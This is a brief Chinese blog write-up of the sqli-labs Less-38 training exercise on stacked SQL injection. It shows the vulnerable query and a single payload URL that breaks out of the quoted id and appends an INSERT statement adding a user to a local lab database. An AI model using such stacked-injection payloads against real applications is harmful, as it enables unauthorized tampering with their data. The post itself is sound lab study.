Apr 09 2020

Sqli-labs Less-38 堆叠注入

作者: 绝缘体..   发布: 2020-04-09 22:29   分类: html, PHP, 编程语言   阅读:   抢沙发  
 
更多

学习了关于stacked injection的相关知识,我们在本关可以得到直接的运用。

在执行select时的sql语句为:SELECT * FROM users WHERE id=’$id’ LIMIT 0,1

可以直接构造如下的payload:

http://127.0.0.1/sql/Less-38/index.php?id=1′;insert into users(id,username,password) values (’38’,’less38′,’hello’)–+

再看数据表中的内容:可以看到less38已经添加。

 

参考:https://www.cnblogs.com/lcamry/p/5762877.html

打赏

本文固定链接: https://www.cxy163.net/archives/4957 | 绝缘体

该日志由 绝缘体.. 于 2020年04月09日 发表在 html, PHP, 编程语言 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: Sqli-labs Less-38 堆叠注入 | 绝缘体
关键字: , , , ,
【上一篇】
【下一篇】

您可能还会对这些文章感兴趣!

  1. 子域名收集
  2. docker进阶_docker-compose
  3. html5 画布时钟效果
  4. js去掉内容中所有html标记的方法
  5. PHP给源代码加密的几种方法
  6. CDN绕过
  7. Swoole实践:4-使用Swoole实现在线聊天
  8. php的password_hash方法详解
  9. 各大网站CSS代码初始化集合
  10. 使用中间件记录Laravel慢请求
  11. 微信图片禁止外链 此图片来自微信公众平台未经允许
  12. laravel 缓存系统的使用
  13. python黑帽子(第五章)
  14. python黑帽子(第二章)
  15. 最常用的100个PHP函数排行榜
  16. BUUCTF-[WebLogic]CVE-2017-10271(反

Sqli-labs Less-38 堆叠注入:等您坐沙发呢!

发表评论


快捷键:Ctrl+Enter